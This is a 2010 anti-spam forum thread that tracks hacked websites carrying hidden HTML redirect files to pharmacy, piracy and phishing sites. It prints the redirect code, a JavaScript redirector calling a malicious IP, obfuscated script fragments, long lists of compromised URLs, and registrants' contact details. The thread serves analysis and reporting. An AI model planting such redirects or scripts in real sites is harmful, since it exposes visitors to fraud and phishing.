Compromised hosts

Any research, news or information regarding the wide variety of techniques criminals use to take over your computers or web servers.

Compromised hosts

Postby Red Dwarf » Mon Oct 25, 2010 12:10 am

I can detect a large number of legitimate hosts being used as redirectors in spam.

Having seen the bad guys in blackhat forums selling off FTP passwords by the thousand, I suspect I know what is happening. (However, this could also be the work of a back-door trojan).

Speculation
Spammer buys a thousand FTP sites + passwords.
He uses the list to FTP to an existing web site, and stores a small file under a randomly generated name.

Example, he has the password for the legitimate site http://oga.7u.cz which is a free hosting site in the Czech Republic, on http://7u.cz
So he logs in via FTP and puts a file called qwqhwy.html onto the free site. It contains
Code: Select all
<html><head>
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://shop-digital-software-7.com">
</head></html>

That is a simple redirection to a Eurosoft piracy site, shop-digital-software-7.com registered on a Ukrainian registrar by a Russian who gives his details as
Code: Select all
Vladislav Petrenko altsrv@gmail.com
Private person
Marksa, 237, 93
Moskva, 127020
RUSSIAN FEDERATION
+7.9072351981

Then he spams the URL in his spam run as
http://oga.7u.cz/qwqhwy.html

If a recipient clicks on the link, he is redirected to the target site, which is less likely to be blacklisted by the URL detection method. (As it so happens, Firefox intercepts this software piracy target with a Web Site Forgery! warning)
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Example 2

Postby Red Dwarf » Mon Oct 25, 2010 12:19 am

Another example
http://www.piedmont.in is a Development Management & Asset Management company located in India.

The server has a file added in its server root directory, giving URL
http://www.piedmont.in/mkp.html

mkp.html contains
<html><head>
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://digitalriverinteractiveone.com">
</head></html>

The redirection target digitalriverinteractiveone.com is spam brand EuroSoft, registered with CENTER OF UKRAINIAN INTERNET NAMES by registrant
Code: Select all
Eduard Petrov nuclear-domains@gmail.com
ul. Pushkina, d. 4, kv. 3
Voronezh, 394000
RUSSIAN FEDERATION
+7.4732789652

Firefox traps the access to the target with a Web Site Forgery! warning.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Example 3

Postby Red Dwarf » Mon Oct 25, 2010 12:31 am

Legitimate site = http://www.soyuzonline.net/
Compromise = http://www.soyuzonline.net/caqdhd.html
Added file caqdhd.html =
Code: Select all
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://giftshopmartone.com">
</head></html>

Redirection target giftshopmartone.com = World Pharmacy
Registrar: CENTER OF UKRAINIAN INTERNET NAMES
Code: Select all
Registrant:
Vladislav Petrenko altsrv@gmail.com
Private person
Marksa, 237, 93
Moskva, 127020
RUSSIAN FEDERATION
+7.9072351981
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Mon Oct 25, 2010 12:58 am

Examples redirecting to giftshopmartone.com
admin.kostik.od.ua/tdks.html
alicka.divadlovosa.cz/al.html
danielbarbosa.hd1.com.br/qcv.html
ekfupload.hostujem.sk/awfjze.html
geralt.darklight.com.ua/jyhlnyt.html
lossantos.hostujem.sk/ahbod.html
m.tamilmob.com/ulgctt.html
rssci.zymichost.com/y.html
segurancacompleta.agilityhoster.com/rx.html
tremaitalia.altervista.org/pdmik.html
upload.mpspb.com/mkzlpey.html
www.3code.it/zkjrvd.html
www.adgroup.ae/qaqjk.html
www.autovarsity.com/uzjb.html
www.brightcotech.net/rvvgylos.html
www.calincatalina.home.ro/pszd.html
www.elsenglish.com/tsnr.html
www.geekzon.com/a.html
www.greatcasinosports.co.uk/yetlfe.html
www.marudhara.dhamma.org/acnuyas.html
www.pallavincg.org/nipvx.html
www.soyuzonline.net/caqdhd.html
www.tandalasafaris.co.ke/hhdgjfv.html
www.tandalasafaris.co.ke/xw.html
www.tepc.gov.np/hlaypmb.html
www.tepc.gov.np/yycxkt.html
www.ukcasinowin.co.uk/qzpawuqe.html
www.yonsed.org.np/posq.html

Examples redirecting to digitalriverinteractiveone.com
www.piedmont.in/mkp.html
www.transafricapublishers.net/mgnfzybh.html

Examples redirecting to datpills.com (Pharmacy Express eNom / Namecheap, Russian registrant)
admin.kostik.od.ua/rnmzy.html
admin.kostik.od.ua/zh.html
alicka.divadlovosa.cz/cy.html
alquran.22web.net/aevjvn.html
alquran.22web.net/c.html
astroscience.hd1.in/dooa.html
astroscience.hd1.in/ewhjvwdk.html
astroscience.hd1.in/lmyojjn.html
astroscience.hd1.in/op.html
boardstore.com.ua/gmrj.html
boardstore.com.ua/swlko.html
bouny.freehostia.com/onyxbuo.html
bryanli.me.pn/uamegkcq.html
cellantenachicago.home.pl/ufqsj.html
chelmonline.home.pl/wxp.html
cmok.neostrada.pl/ewrqefao.html
cmok.neostrada.pl/lfwb.html
coursaffli.freehostia.com/ge.html
coursaffli.freehostia.com/tmmwqr.html
danielbarbosa.hd1.com.br/kq.html
darklight.com.ua/ihj.html
ekfupload.hostujem.sk/zxr.html
gbj.com.br/tsdonxf.html
geralt.darklight.com.ua/dxlvixer.html
hot.kh.ua/wz.html
jf.bluepie.com.au/n.html
kghost.co.cc/pfzd.html
lossantos.hostujem.sk/oultyk.html
m.tamilmob.com/z.html
matesqo.zaridi.to/zrheu.html
mladen.sni.users.sbb.rs/nq.html
model.konotop.net/mvjzuuvu.html
model.konotop.net/ttkuu.html
mysoul.zymichost.com/xdinxv.html
oga.7u.cz/abznxamw.html
oga.7u.cz/gxcjq.html
oga.7u.cz/mduwwivc.html
oga.7u.cz/tky.html
raynhamprimaryschool.co.uk/ns.html
rexonateens.co.id/epile.html
riconsindianetwork.zymichost.com/thm.html
rssci.zymichost.com/uwir.html
rssci.zymichost.com/wjokv.html
sannin.altervista.org/apktzt.html
segurancacompleta.agilityhoster.com/ooxqwu.html
segurancacompleta.agilityhoster.com/t.html
smire.agilityhoster.com/dpgcy.html
smire.agilityhoster.com/t.html
topwebblogs.freehostia.com/gw.html
topwebblogs.freehostia.com/toawwbqp.html
tremaitalia.altervista.org/jfpdx.html
upload.mpspb.com/yyz.html
www.1setembro.com/bchjha.html
www.1setembro.com/ldtpiow.html
www.brightcotech.net/fmqbdph.html
www.d3sfinance.com/rrkmgg.html
www.donjonfetish.com/dj.html
www.elsenglish.com/pyuxjlqk.html
www.elsenglish.com/vgi.html
www.fasti.org/dqqgy.html
www.fasti.org/tccm.html
www.felinna.com/uq.html
www.freezonesabac.com/ijfj.html
www.geekzon.com/tfreb.html
www.marudhara.dhamma.org/frhmpdec.html
www.marudhara.dhamma.org/kjoqrja.html
www.mediacharme.com/m.html
www.meei.edu.np/q.html
www.meei.edu.np/vkx.html
www.minouklim.com/evrx.html
www.piedmont.in/o.html
www.soyuzonline.net/zdvibitg.html
www.sylse.com/xwdpwsd.html
www.systemsconsults.com/spdks.html
www.tandalasafaris.co.ke/fktmv.html
www.tandalasafaris.co.ke/lfzqf.html
www.tandalasafaris.co.ke/zhftpor.html
www.tarentaalrandsafari.co.za/tjrkw.html
www.tepc.gov.np/npsl.html
www.tepc.gov.np/wlzpaq.html
www.tinsight.pt/qmk.html
www.tinsight.pt/wylovls.html
www.vejinbarzan.com/lewhrzbu.html
www.windyplains.co.za/nuhmgfxz.html
www.yonsed.org.np/hbrmh.html
www.yonsed.org.np/tdx.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby AlphaCentauri » Mon Oct 25, 2010 7:46 am

And digitalriverinteractiveone.com looks like a potential phishing site -- digitalriver is a well known internet marketing firm that has spammed me a few times.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Compromised hosts

Postby Red Dwarf » Mon Oct 25, 2010 5:46 pm

Today's examples are distinguished by the name "about.html" and redirect to a phishing site in the form
Code: Select all
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://98.143.159.27/contacts/s3">
</head>

That IP is on OC3 Networks & Web Solutions, LLC with contact details
NOC293-ARIN
Phone: +1-213-614-9371
Email: noc@quadranet.com

A sampling: of redirects to 98.143.159.27/contacts/s3
adventurelifesigns.co.uk/about.html
ahgphotography.co.uk/about.html
ahgweddings.co.uk/about.html
alexandria65.2mhost.com/~thrumyle/about.html
ashmorgan.co.uk/about.html
bingo.littlewoodsbingo.com/about.html
blog.tafpi.com/about.html
bodyartuk.co.uk/about.html
bollywoodindianrestaurant.com.au/about.html
brooklynunderwriting.com.au/about.html
courageousleadership.co.uk/about.html
cpapexpressaustralia.com.au/about.html
cpapselect.com.au/about.html
cyclechallenge40plus.co.uk/about.html
devonbard.co.uk/about.html
ebinder.matrixachievementgroup.com/about.html
endevour.co.uk/about.html
fifthelement.co.nz/about.html
ftpsvc.blioreader.com/about.html
headphones.co.nz/about.html
homepages4.cultrix.co.uk/~ahgcreat/about.html
homepages4.cultrix.co.uk/~janetbar/about.html
indulgencebarandgrill.co.uk/about.html
jennygreer.co.uk/about.html
johnwdesigns.co.uk/about.html
mathesonmclachlan.co.uk/about.html
mattyhorrocks.co.uk/about.html
njgaragesales.netfirms.com/about.html
peekabooimages.com.au/about.html
propertyinvesting.co.uk/about.html
rnls.school.nz/about.html
senseoffreedom.co.uk/about.html
teamfastplay.te.funpic.de/about.html
trobl.velopers.net/about.html
valkanos.lunarpages.com/~bryce2/about.html
venus.webcity.com.au/~spa33796/about.html

5abi.com/about.html
aquarium.lu/about.html
bengaloncology.com/about.html
bergeng.com/about.html
cepd.org.za/about.html
dgccsteel.com/about.html
duckduckgoose.co.uk/about.html
freckledhound.com/about.html
kago24.de/about.html
kommunalesbildungsmonitoring.de/about.html
oddmedia.com/about.html
orbitalcomms.com/about.html
patricksport24.de/about.html
plantershop.de/about.html
polar2.de/about.html
raffaelmache.de/about.html
reptastic.com/about.html
sportandstyle24.com/about.html
sustainabletn.org/about.html
telemarketingcanada.ca/about.html
theoakshomestead.co.nz/about.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Mon Oct 25, 2010 6:37 pm

Redirections to the eftpsid phishing

ahgphotography.co.uk/crlnuf/v7ty.html
blackrobin.co.nz/p6ma49l/sdhpik6.html
box348.bluehost.com/~fivzert8/1mroa37/60hn62.html
box348.bluehost.com/~fivzert8/1mroa37/jc7b4of.html
box363.bluehost.com/~davidcoa/wbhui8/wyy7m.html
brooklynunderwriting.com.au/uenjvi/pb2b.html
capricorn.webserversystems.com/~nihcamer/9wauyf/rcrk6a.html
capricorn.webserversystems.com/~nihcamer/9wauyf/zqnomf8.html
gator605.hostgator.com/~rog200/vo96i25/by6b1.html
greatwalthamschool.co.uk/ps9rdk/iio30.html
headphones.co.nz/nsiaevr/ma10.html
host10.com1usa.com/~com4473/kca4vqu/fyc34.html
host10.com1usa.com/~com4473/kca4vqu/otgno.html
johnwdesigns.co.uk/cts7y3/olorem.html
lcp1.irides.com/~premierp/mnnl6i/3ymfs.html
lpr103.qwestoffice.com/~bousloginsurance/stkp5z/0phv.html
mail.jasonjollins.com/~jasonjol/es3605/c080.html
mars.gigapros.com/~qteecosm/35m3fy/bpnik0.html
mlwe010.servidoresdns.net/~fitxers.csigestio.com/wvm6oe/eb6aw3.html
ngmusicnw.co.uk/8xfa9m6/kyuup3.html
ns1.hyperflowhosting.com/~safemail/hudfcrp/xof1x.html
ns211189.ovh.net/zxzk0l/lb5f9m.html
ns211190.ovh.net/tq0iste/qo3bys.html
pirateshipoffools.co.uk/3i854v/3ikcezd.html
pong.whspn.net/~freddeat/nmdjgw/pzy1cdz.html
sb.cyberspaceindia.com/~wkhindia/xp22f7/98px.html
sb.cyberspaceindia.com/~wkhindia/xp22f7/rl8im.html
trobl.velopers.net/goyw5a/4zyhx.html
usa.capsaicin.co.nz/~top10/06h2di/sdsr6.html
uscentral10.myserverhosts.com/~wfuhelpr/7ikhz6i/l6z2l9r.html
useast3.myserverhosts.com/~tecnojob/pkfsnu/0sgkwpl.html
web2.verushost.com/~dottrix/7ib70z/5nioc.html

www.datatrackinc.com/30m06vm/vqcr.html
www.dayspringtrio.com/vpn00of/9ykl6f.html
www.dgccsteel.com/8cwjbf/9rfotss.html
www.findyourlet.com/69oe065/t1pg.html
www.gingerflex.com/ex5ow4o/8u45hl.html
www.janahl.de/dnwmqmw/j57j.html
www.mikedoner.com/en318e4/dtjqw.html
www.oddmedia.com/mj7x3f8/e73x.html
www.sanocur.de/u43874j/jephh1k.html
www.sluglet.myby.co.uk/li6i4el/j8qkxcr.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Analysis of a compromised host

Postby Red Dwarf » Mon Oct 25, 2010 10:46 pm

Take an example - ahgphotography.co.uk

In its server root directory it has two directories and a file
    * 310nd73/
    * about.html
    * crlnuf/
the file about.html contains a refresh redirection to phishing attempt 98.143.159.27/contacts/s3

Directory 310nd73 contains
    * 2o393ip.html
    * 51cfl0j.html
    * c1bg1he.html
    * m0as08.html
    * qgxli.html
    * rimjrv.html
    * vhxrk.html
    * vj06c9.html
Each of these redirects to an eftpsid phishing attempt


Directory crlnuf contains
    * 04my1v.html
    * i15i17.html
    * ldupa0.html
    * v7ty.html

These also redirect to the eftpsid phishing attempt

There appear to be no other entries in the server root directory.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Fri Oct 29, 2010 11:27 pm

Compromised servers redirection to the Pharmacy Express fraud on drmedicpills.com
Nov 24 Edit: Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

admin.kostik.od.ua/ftb.html
alquran.22web.net/w.html
blacktigers.hdfree.com.br/waimy.html
boardstore.com.ua/vjikrz.html
chelmonline.home.pl/qvbtuh.html
darklight.com.ua/dbl.html
fgst.tecar.com.ua/igpkba.html
gothic.com.ua/jweldq.html
idea.if.ua/yd.html
kghost.co.cc/tysdc.html
lbmk.in.lutsk.ua/q.html
m.tamilmob.com/tlajurow.html
mladen.sni.users.sbb.rs/qounvb.html
model.konotop.net/d.html
muslimity.mughits.com/xc.html
oga.7u.cz/fq.html
oga.7u.cz/ritqzvug.html
raynhamprimaryschool.co.uk/cwtomn.html
sp2.trzcianka.com.pl/c.html
upload.mpspb.com/afztil.html
vistarusaplus.site.aplus.net/rlbfby.html
warfield.com.au/zmbyxhmw.html
webmail.mayaad.net/isbr.html

cepheidmexico.com/rbjodrueec.html
d3sfinance.com/zhwthzh.html
donjonfetish.com/gjrf.html
elsenglish.com/suzzvrj.html
fasti.org/hmixywx.html
freezonesabac.com/rgdsq.html
ibots.org/qqjm.html
mb2ny.com/ekuwwka.html
minouklim.com/cqpd.html
pallaviinstitutions.com/xgfunqde.html
pallavincg.org/vwrhvp.html
saadees.com/qqdvglg.html
tepc.gov.np/kuctzc.html
terminalpitalito.com/g.html
vejinbarzan.com/sokfj.html
windyplains.co.za/umb.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Fri Nov 05, 2010 3:58 pm

The army of compromised hosts has been loaded with a new infectionfile. about.html

about.html
Code: Select all
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://77.78.233.131/loading/trafflit.php">
</head>

http://77.78.233.131/loading/trafflit.php
Code: Select all
<script>
var wnd = window;
var nav = wnd.navigator;
        if (nav.javaEnabled()) {
                var metka = '2';
        }
        location.href = ('http://77.78.233.131/loading/rotator.php?unique=' + metka + '');
        if (!frames.nav['taintEnabled']()) {
                var metka = '1';
        }
        location.href = ('http://77.78.233.131/loading/rotator.php?unique=' + metka + '');
</script>

http://77.78.233.131/loading/rotator.php?unique=2
Code: Select all
HTTP/1.1 302 Found
Location: http://google.com
Content-Type: text/html; charset=UTF-8
Content-Length: 0


The IP 77.78.233.131 is in Sarejevo, Bosnia,
####################################
# in case of abuse please contact
# abuse@globalnet.ba
####################################
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Fri Nov 05, 2010 4:06 pm

Red Dwarf wrote:The army of compromised hosts has been loaded with a new infectionfile. about.html

about.html
Code: Select all
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://77.78.233.131/loading/trafflit.php">
</head>

http://77.78.233.131/loading/trafflit.php
Code: Select all
<script>
var wnd = window;
var nav = wnd.navigator;
        if (nav.javaEnabled()) {
                var metka = '2';
        }
        location.href = ('http://77.78.233.131/loading/rotator.php?unique=' + metka + '');
        if (!frames.nav['taintEnabled']()) {
                var metka = '1';
        }
        location.href = ('http://77.78.233.131/loading/rotator.php?unique=' + metka + '');
</script>


It is not recommended to load any of these sites, nor to allow the loading of the code at IP 77.78.233.13 except in a protected sandbox

The IP 77.78.233.131 is in Sarejevo, Bosnia,
####################################
# in case of abuse please contact
# abuse@globalnet.ba
####################################
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Fri Nov 05, 2010 4:08 pm

A small sample of compromised hosts with the "about.html" file added:

server.flattexthub.com/~working/about.html
server1.velnet.net/~interne1/about.html
sh.tocando.de/~bugsandm/about.html
smtp01.houseindustries.com/about.html
sparkle.superdomainzone.com/~asiancri/about.html
srv95.tophost.ch/~desynch/about.html
stats.chair.mysitehosted.com/~kevinhei/about.html
targetyouremail.co.uk/about.html
templar.logixcom.net/~vx56166/about.html
tom.me.cz/about.html
trobl.velopers.net/about.html
usa.capsaicin.co.nz/~top10/about.html
uscentral10.myserverhosts.com/~tecaplic/about.html
uscentral10.myserverhosts.com/~wfuhelpr/about.html
useast1.myserverhosts.com/~neurogrd/about.html
useast3.myserverhosts.com/~tecnojob/about.html
valkanos.lunarpages.com/~bryce2/about.html
venus.webcity.com.au/~spa33796/about.html
vhost5ftp.iomart.com/~hopeln203/about.html
web.ody.ca/~londonhottubs/about.html
web2.verushost.com/~dottrix/about.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby NotBuyingIt » Fri Nov 05, 2010 11:34 pm

Red Dwarf wrote:The army of compromised hosts has been loaded with a new infectionfile. about.html
The reports of these files were swamping phishtank.com earlier on Friday. I don't use anything cleverer than various anonymous proxy servers, and during the scam's peak, I was not able to follow the entire chain of deceptive redirection beyond IP 77.78.233.131; but later, the redirections ended at www.google.com. If anyone can tell me, what ruse was being used to encourage people to follow deceptive URLs?
Home is where the heart is / No matter how the heart lives.
NotBuyingIt
Spammer Killing Machine
 
Posts: 609
Joined: Sun Jun 13, 2010 5:22 pm

Re: Compromised hosts

Postby AlphaCentauri » Sat Nov 06, 2010 2:21 am

I'm now seeing files called "stop.html"

From the US on a dynamic IP:
humicon.com/stop.html
refreshes to
timeforrefill.com

= Online Pharmacy

with a very Sancashy color scheme
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Compromised hosts

Postby Red Dwarf » Sat Nov 06, 2010 3:27 am

Phishtank is showing images of Google.com.

I find that also, so long as my system is protected.
This is NOT recommended, but If not protected it goes to http://77.78.233.131/loading/hcp.php which contains some weird stuff, starting
Code: Select all
<html>
<script type='text/javascript' src='js/media.js'></script>
<body>
<script language="javascript">
bigbossraisenoise[likestrangepeople](USEONESBEAMCARRY.goonshag('1dac2db141658924d3c4c0e213100360d0a0de0fdc044a62d22cd9651dac2db0cc8cde19c06cf117d615026c10c16a2599

and ending
Code: Select all
3e4e0b8c9ad13e3e6b1746028065ce451cee4ea00a771217460280da1b9a069720905fb32011a68ea1d2deec156f3c1019fd0308ec2c60e2459c','7424971','33947369'));</script>
<body>
</html>


You can see this also at http://jsunpack.jeek.org/dec/go?report= ... 90ad9ccc86
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Next

Return to Botnets, Hijacks and Hacking

Who is online

Users browsing this forum: No registered users and 1 guest

cron